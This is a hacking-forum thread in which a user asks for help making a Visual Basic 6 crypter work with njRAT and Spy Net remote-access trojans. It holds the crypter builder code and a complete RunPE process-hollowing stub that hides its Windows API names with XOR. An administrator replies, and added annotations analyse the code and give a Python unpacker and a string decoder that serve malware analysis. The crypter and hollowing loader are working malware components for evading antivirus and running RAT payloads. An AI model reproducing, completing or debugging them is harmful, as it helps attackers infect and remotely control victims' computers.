
Problem with my crypter

  • 2 Replies
  • 1011 Views

Offline paulitagonzales99

  • Underc0der
  • Posts: 17
  • Activity: 0%
  • Reputation 0
« on: August 26, 2016, 03:54:18 pm »
Hi! Yesterday I decided to create a crypter in Visual Basic 6, but since I know almost nothing about programming I followed the tutorial from Malawere Magazine #1 uploaded here on underc0de. After many hours of work, because I couldn't get it working, I managed to encrypt some njRAT 0.7d servers and some Spy Net ones, but here comes the problem: when I run the encrypted servers they don't connect. I tried with Spy Net and with njRAT and neither connected, while the unencrypted version does work! I tried different stubs (one I made myself and another I took from an njRAT crypter) but the server still doesn't connect. I'm sure the problem is in the crypter. Can you help me make my crypter compatible with njRAT, Spy Net or any other RAT? What do I have to add to the code so the crypter is compatible? Remember that I don't understand much about programming, so I'm speaking from total ignorance. Thanks for your answers and regards.

Here is the crypter code so you can check it.

Code: Visual Basic
Private Sub btnEncriptar_Click()
    Dim Stub As String, Archivo As String

    If txtArchivo.Text = vbNullString Then
        MsgBox "You must load the file to encrypt", vbExclamation, Me.Caption
        Exit Sub
    Else
        ' Read Stub.exe (the loader that will carry the payload) from the builder's folder.
        Open App.Path & "\Stub.exe" For Binary As #1
            Stub = Space(LOF(1))
            Get #1, , Stub
        Close #1

        ' Read the file to "encrypt" (the RAT server). The bytes are held in a
        ' VB String, i.e. they go through an ANSI/Unicode conversion on the way in
        ' and back out.
        Open txtArchivo.Text For Binary As #1
            Archivo = Space(LOF(1))
            Get #1, , Archivo
        Close #1

        With CD
            .DialogTitle = "Select a path..."
            .Filter = "EXE applications|*.exe"
            .ShowSave
        End With

        If Not CD.FileName = vbNullString Then
            ' Hard-coded key; see the note on RC4() below.
            Archivo = RC4(Archivo, "Underc0de")

            ' Output layout: stub, plaintext delimiter, encrypted payload, delimiter.
            Open CD.FileName For Binary As #1
                Put #1, , Stub & "##$$##" & Archivo & "##$$##"
            Close #1

            MsgBox "File encrypted", vbInformation, Me.Caption
        End If
    End If
End Sub

' Despite its name this is not RC4. F() is read before it is initialised, so
' the first loop leaves F as the identity permutation and the password only
' determines the starting value of Y; Temp is never declared (Empty, i.e. 0);
' and the second loop runs one index past the end of Key(), which
' On Error Resume Next swallows. The resulting keystream does not depend on
' the data and becomes the constant &H2 from the eighth byte onward.
Public Function RC4(ByVal Data As String, ByVal Password As String) As String
    On Error Resume Next
    Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
    Key() = StrConv(Password, vbFromUnicode)
    For X = 0 To 255
        Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
        F(X) = X
    Next X
    Key() = StrConv(Data, vbFromUnicode)
    For X = 0 To Len(Data)
        Y = (Y + F(Y) + 1) Mod 256
        Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
    Next X
    RC4 = StrConv(Key, vbUnicode)
End Function

Private Sub btnExaminar_Click()
    With CD
        .DialogTitle = "Select a file"
        .Filter = "EXE applications|*.exe"
        .ShowOpen
    End With

    If Not CD.FileName = vbNullString Then
        txtArchivo.Text = CD.FileName
    End If
End Sub
« Last edit: August 26, 2016, 04:11:56 pm by ANTRAX »
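An added example, not part of the original post or its code: an analyst-side unpacker for files written by the builder above. It reproduces what the posted RC4() function actually computes when run in VB6 (F() read before initialisation, Temp undeclared, On Error Resume Next) rather than real RC4, and uses that to pull the embedded payload back out of the stub + `##$$##` container. It assumes the payload bytes survive the VB String round trip unchanged, which holds on a single-byte ANSI code page such as 1252; the stub and payload used below are constructed sample bytes, not a real stub or RAT server.

```python
# Added example: unpacker for the stub || "##$$##" || payload || "##$$##"
# container produced by the crypter above. Not code from the post.

DELIM = b"##$$##"          # plaintext separator the builder writes (from the post)
PASSWORD = b"Underc0de"    # hard-coded "RC4" key (from the post)


def initial_state(password: bytes) -> int:
    """First loop of the posted RC4(): Y accumulates 256 key bytes.

    F(X) is read before F(X) = X executes and the array starts zeroed, so the
    key schedule degenerates: F ends up as the identity permutation and the
    only thing the password influences is this starting value of Y.
    """
    y = 0
    for x in range(256):
        y = (y + password[x % len(password)]) % 256
    return y


def keystream(password: bytes, length: int) -> bytes:
    """Second loop of the posted RC4(), with F the identity and Temp = 0.

    Y = (Y + F(Y) + 1) Mod 256            ->  Y = 2Y + 1 (mod 256)
    k = F(Temp + F((Y + F(Y)) Mod 254))   ->  k = 2Y mod 254
    Since 2**8 == 0 (mod 256), Y is 255 after eight steps for any start value,
    so every byte from offset 7 onward is XORed with the constant 0x02.
    """
    y = initial_state(password)
    out = bytearray()
    for _ in range(length):
        y = (2 * y + 1) % 256
        out.append((2 * y) % 254)
    return bytes(out)


def xor_stream(data: bytes, password: bytes) -> bytes:
    """Encrypt or decrypt: the scheme is a plain XOR, hence symmetric."""
    ks = keystream(password, len(data))
    return bytes(d ^ k for d, k in zip(data, ks))


def build_container(stub: bytes, payload: bytes, password: bytes = PASSWORD) -> bytes:
    """What btnEncriptar_Click writes: Stub & "##$$##" & RC4(payload) & "##$$##"."""
    return stub + DELIM + xor_stream(payload, password) + DELIM


def unpack(container: bytes, password: bytes = PASSWORD) -> bytes:
    """Recover the original payload from a crypted file.

    The last two delimiters bracket the payload; searching from the end avoids
    a false hit if the stub itself contains the delimiter bytes.
    """
    end = container.rfind(DELIM)
    if end < 0:
        raise ValueError("delimiter layout not found")
    start = container.rfind(DELIM, 0, end)
    if start < 0:
        raise ValueError("delimiter layout not found")
    payload = xor_stream(container[start + len(DELIM):end], password)
    if payload[:2] != b"MZ":
        raise ValueError("decrypted payload is not a PE image")
    return payload


if __name__ == "__main__":
    # Constructed sample data (not a real stub or RAT server).
    fake_stub = b"MZ" + b"\x00" * 62 + b"stub-code-here" * 4
    fake_payload = b"MZ\x90\x00" + bytes(range(256)) * 2 + b"PE\x00\x00"
    crypted = build_container(fake_stub, fake_payload)
    assert unpack(crypted) == fake_payload
    print("keystream head:", keystream(PASSWORD, 10).hex())
    # keystream head: 94284e9e407e00020202
    # Only the first seven bytes vary with the password; the rest of the
    # payload is simply XORed with 0x02.
```

Because the keystream does not depend on the data, the recovered bytes are byte-for-byte what the builder read in; the "MZ" check at the end is the cheapest sanity test that the delimiter split landed on the payload and not on the stub.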

Online ANTRAX

  • Administrator
  • Posts: 5339
  • Activity: 16.67%
  • Reputation 30
« Reply #1 on: August 26, 2016, 04:13:59 pm »
Hi,
The problem is not in the code you just posted. It must be in the stub.
What this code does is basically take the server and join it to the crypter's stub.
If it is breaking, the problem is in the stub and not here.

Regards,
ANTRAX


Offline paulitagonzales99

  • Underc0der
  • Posts: 17
  • Activity: 0%
  • Reputation 0
« Reply #2 on: August 26, 2016, 04:48:12 pm »
Quote from: ANTRAX
Hi,
The problem is not in the code you just posted. It must be in the stub.
What this code does is basically take the server and join it to the crypter's stub.
If it is breaking, the problem is in the stub and not here.

Regards,
ANTRAX

Hi ANTRAX, thanks for your reply! I just checked the stub as you said and, honestly, I noticed something very strange that I don't know whether is normal or not: you see, the Malawer Magazine tutorial said to create 2 modules, one called RunPe and another called stub, and to copy and paste the respective code into them. Now I opened the project again and the modules have disappeared! A new one called RunPE (STUB.bas) appeared, and inside this module I see the following code:
 

Code: Visual Basic
' RunPE ("process hollowing") loader module. The Windows API names it needs at
' run time are XOR-obfuscated with SKXXP() and resolved through
' LoadLibraryA/GetProcAddress, so they never appear in the import table; the
' call itself is made through a small x86 thunk executed via CallWindowProcA
' (see TOLNIYR). Only CreateProcessA and WriteProcessMemory are plain Declares.
Private Const CONTEXT_FULL As Long = &H10007
Private Const MAX_PATH As Integer = 260
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long

Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadID As Long
End Type

Private Type FLOATING_SAVE_AREA
    ControlWord As Long
    StatusWord As Long
    TagWord As Long
    ErrorOffset As Long
    ErrorSelector As Long
    DataOffset As Long
    DataSelector As Long
    RegisterArea(1 To 80) As Byte
    Cr0NpxState As Long
End Type

' 32-bit thread CONTEXT, as filled in by GetThreadContext.
Private Type CONTEXT
    ContextFlags As Long

    Dr0 As Long
    Dr1 As Long
    Dr2 As Long
    Dr3 As Long
    Dr6 As Long
    Dr7 As Long

    FloatSave As FLOATING_SAVE_AREA
    SegGs As Long
    SegFs As Long
    SegEs As Long
    SegDs As Long
    Edi As Long
    Esi As Long
    Ebx As Long
    Edx As Long
    Ecx As Long
    Eax As Long
    Ebp As Long
    Eip As Long
    SegCs As Long
    EFlags As Long
    Esp As Long
    SegSs As Long
End Type

' PE file structures (32-bit layout).
Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type

Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    characteristics As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Private Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    characteristics As Long
End Type

' Calls export ZKKTQ of library ONIW by address, passing HDISUUU() as stdcall
' arguments, without a Declare for it. It assembles this into SBUH():
'   58 59 59 59 59   pop eax / pop ecx x4  (save return address, discard the
'                                            four dummy CallWindowProcA params)
'   50               push eax              (restore return address)
'   68 imm32 ...     push <arg>            (arguments, last one first)
'   E8 rel32         call <target>
'   C3               ret
' and then runs the buffer as code through CallWindowProcA.
Public Function TOLNIYR(ByVal ONIW As String, ByVal ZKKTQ As String, ParamArray HDISUUU()) As Long
    Dim YOZXQ As Long, SBUH(&HEC00& - 1) As Byte, OXM As Long, HTPJULV As Long

    HTPJULV = GetProcAddress(LoadLibraryA(ONIW), ZKKTQ)
    If HTPJULV = 0 Then Exit Function

    YOZXQ = VarPtr(SBUH(0))
    RtlMoveMemory ByVal YOZXQ, &H59595958, &H4: YOZXQ = YOZXQ + 4
    RtlMoveMemory ByVal YOZXQ, &H5059, &H2: YOZXQ = YOZXQ + 2
    For OXM = UBound(HDISUUU) To 0 Step -1
        RtlMoveMemory ByVal YOZXQ, &H68, &H1: YOZXQ = YOZXQ + 1
        RtlMoveMemory ByVal YOZXQ, CLng(HDISUUU(OXM)), &H4: YOZXQ = YOZXQ + 4
    Next
    RtlMoveMemory ByVal YOZXQ, &HE8, &H1: YOZXQ = YOZXQ + 1
    RtlMoveMemory ByVal YOZXQ, HTPJULV - YOZXQ - 4, &H4: YOZXQ = YOZXQ + 4
    RtlMoveMemory ByVal YOZXQ, &HC3, &H1: YOZXQ = YOZXQ + 1
    TOLNIYR = CallWindowProcA(VarPtr(SBUH(0)), 0, 0, 0, 0)
End Function

' Repeating-key XOR used to hide the API name strings below (character i of the
' data is XORed with character i of the key, wrapping at the key length).
Public Function SKXXP(ByVal UTXLWH As String, ByVal IRWMR As String) As String
    Dim SAW As Long

    For SAW = 1 To Len(UTXLWH)
        SKXXP = SKXXP & Chr(Asc(Mid(IRWMR, IIf(SAW Mod Len(IRWMR) <> 0, SAW Mod Len(IRWMR), Len(IRWMR)), 1)) Xor Asc(Mid(UTXLWH, SAW, 1)))
    Next SAW
End Function

' The hollowing routine.
'   MKRVR : path of the host executable to start suspended
'   DPWO(): the payload PE image (already decrypted), as raw file bytes
'   MLPDO : command line handed to the new process
Public Sub IYUZKMM(ByVal MKRVR As String, ByRef DPWO() As Byte, MLPDO As String)
    Dim VPK As Long, SSYY As IMAGE_DOS_HEADER, LHBND As IMAGE_NT_HEADERS, NCSMST As IMAGE_SECTION_HEADER
    Dim WNPELGD As STARTUPINFO, FZRQGF As PROCESS_INFORMATION, BOXJCL As CONTEXT

    ' Parse the payload's DOS header and its 248-byte 32-bit NT headers.
    WNPELGD.cb = Len(WNPELGD)
    RtlMoveMemory SSYY, DPWO(0), 64
    RtlMoveMemory LHBND, DPWO(SSYY.e_lfanew), 248

    ' 1. Create the host process suspended.
    CreateProcessA MKRVR, " " & MLPDO, 0, 0, False, CREATE_SUSPENDED, 0, 0, WNPELGD, FZRQGF
    ' 2. ntdll!NtUnmapViewOfSection(hProcess, ImageBase): unmap whatever the host
    '    has at the payload's preferred base.
    TOLNIYR SKXXP(Chr(33) & Chr(36) & Chr(38) & Chr(39) & Chr(47), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(1) & Chr(36) & Chr(23) & Chr(37) & Chr(46) & Chr(40) & Chr(55) & Chr(2) & Chr(46) & Chr(39) & Chr(50) & Chr(26) & Chr(48) & Chr(24) & Chr(63) & Chr(45) & Chr(38) & Chr(61) & Chr(33) & Chr(40), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hProcess, LHBND.OptionalHeader.ImageBase
    ' 3. kernel32!VirtualAllocEx(hProcess, ImageBase, SizeOfImage,
    '    MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE): one RWX region for
    '    the whole image at its preferred base (no relocation handling).
    TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(25) & Chr(57) & Chr(48) & Chr(63) & Chr(54) & Chr(40) & Chr(43) & Chr(21) & Chr(43) & Chr(46) & Chr(42) & Chr(54) & Chr(19) & Chr(51), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hProcess, LHBND.OptionalHeader.ImageBase, LHBND.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
    ' 4. Copy the headers, then each section to ImageBase + VirtualAddress
    '    (section headers follow the NT headers, 40 bytes each).
    WriteProcessMemory FZRQGF.hProcess, ByVal LHBND.OptionalHeader.ImageBase, DPWO(0), LHBND.OptionalHeader.SizeOfHeaders, 0

    For VPK = 0 To LHBND.FileHeader.NumberOfSections - 1
        RtlMoveMemory NCSMST, DPWO(SSYY.e_lfanew + 248 + 40 * VPK), Len(NCSMST)
        WriteProcessMemory FZRQGF.hProcess, ByVal LHBND.OptionalHeader.ImageBase + NCSMST.VirtualAddress, DPWO(NCSMST.PointerToRawData), NCSMST.SizeOfRawData, 0
    Next VPK

    ' 5. kernel32!GetThreadContext on the suspended main thread. In a freshly
    '    created 32-bit process Ebx points at the PEB, so Ebx + 8 is
    '    PEB->ImageBaseAddress, which is overwritten with the payload's base;
    '    Eax holds the entry point the thread start routine will jump to, so it
    '    is redirected to the payload's AddressOfEntryPoint.
    BOXJCL.ContextFlags = CONTEXT_FULL
    TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(8) & Chr(53) & Chr(54) & Chr(31) & Chr(43) & Chr(59) & Chr(34) & Chr(53) & Chr(35) & Chr(1) & Chr(42) & Chr(59) & Chr(34) & Chr(46) & Chr(34) & Chr(58), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hThread, VarPtr(BOXJCL)
    WriteProcessMemory FZRQGF.hProcess, ByVal BOXJCL.Ebx + 8, LHBND.OptionalHeader.ImageBase, 4, 0
    BOXJCL.Eax = LHBND.OptionalHeader.ImageBase + LHBND.OptionalHeader.AddressOfEntryPoint
    ' 6. kernel32!SetThreadContext, then kernel32!ResumeThread: the host process
    '    now runs the payload image.
    TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(28) & Chr(53) & Chr(54) & Chr(31) & Chr(43) & Chr(59) & Chr(34) & Chr(53) & Chr(35) & Chr(1) & Chr(42) & Chr(59) & Chr(34) & Chr(46) & Chr(34) & Chr(58), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hThread, VarPtr(BOXJCL)
    TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(29) & Chr(53) & Chr(49) & Chr(62) & Chr(46) & Chr(44) & Chr(19) & Chr(60) & Chr(53) & Chr(39) & Chr(36) & Chr(49), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hThread
End Sub
« Last edit: August 26, 2016, 05:05:58 pm by paulitagonzales99 »
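An added analysis example, not code from the post: a Python port of the stub's SKXXP() routine that decodes the Chr() sequences above with the key literal from the module, recovering the API names the RunPE loader resolves at run time, and a small check that the decoded sequence is the canonical process-hollowing chain (unmap, allocate, get context, set context, resume). The byte sequences and the key are copied from the posted module; nothing else is assumed.

```python
# Added example (not code from the post): decode the XOR-obfuscated API names
# in the RunPE stub above and check the decoded call order.

KEY = b"OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"  # key literal from the stub

# (library, export) byte sequences exactly as the Chr() chains appear in
# IYUZKMM, in the order the stub calls them.
OBFUSCATED_CALLS = [
    (bytes([33, 36, 38, 39, 47]),
     bytes([1, 36, 23, 37, 46, 40, 55, 2, 46, 39, 50, 26, 48, 24, 63, 45, 38, 61, 33, 40])),
    (bytes([36, 53, 48, 37, 38, 37, 116, 102]),
     bytes([25, 57, 48, 63, 54, 40, 43, 21, 43, 46, 42, 54, 19, 51])),
    (bytes([36, 53, 48, 37, 38, 37, 116, 102]),
     bytes([8, 53, 54, 31, 43, 59, 34, 53, 35, 1, 42, 59, 34, 46, 34, 58])),
    (bytes([36, 53, 48, 37, 38, 37, 116, 102]),
     bytes([28, 53, 54, 31, 43, 59, 34, 53, 35, 1, 42, 59, 34, 46, 34, 58])),
    (bytes([36, 53, 48, 37, 38, 37, 116, 102]),
     bytes([29, 53, 49, 62, 46, 44, 19, 60, 53, 39, 36, 49])),
]

# Hollowing steps performed after CreateProcess(CREATE_SUSPENDED). The
# WriteProcessMemory calls in between use a plain Declare and are not obfuscated.
HOLLOWING_CHAIN = [
    "NtUnmapViewOfSection", "VirtualAllocEx",
    "GetThreadContext", "SetThreadContext", "ResumeThread",
]


def skxxp(data: bytes, key: bytes = KEY) -> str:
    """Port of SKXXP(): byte i is XORed with key[i mod len(key)].

    VB's 1-based IIf(SAW Mod L <> 0, SAW Mod L, L) picks the same key byte
    as the 0-based i % L used here. XOR is symmetric, so this also re-encodes.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode("ascii")


def resolve_call_sequence(calls=OBFUSCATED_CALLS):
    """Decode every (library, export) pair into a 'lib!Export' string."""
    return [f"{skxxp(lib)}!{skxxp(fn)}" for lib, fn in calls]


def is_hollowing_chain(sequence) -> bool:
    """True if the hollowing steps appear in canonical order; other calls may
    be interleaved between them."""
    exports = [s.rsplit("!", 1)[-1] for s in sequence]
    pos = 0
    for name in exports:
        if pos < len(HOLLOWING_CHAIN) and name == HOLLOWING_CHAIN[pos]:
            pos += 1
    return pos == len(HOLLOWING_CHAIN)


if __name__ == "__main__":
    seq = resolve_call_sequence()
    for call in seq:
        print(call)
    print("process hollowing chain:", is_hollowing_chain(seq))
```

The point of decoding is that the import table of such a stub shows only CreateProcessA, WriteProcessMemory, LoadLibraryA, GetProcAddress and CallWindowProcA; the unmap/allocate/set-context/resume sequence that identifies it as a hollowing loader only becomes visible after the strings are decoded, or in API-call telemetry at run time.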

 
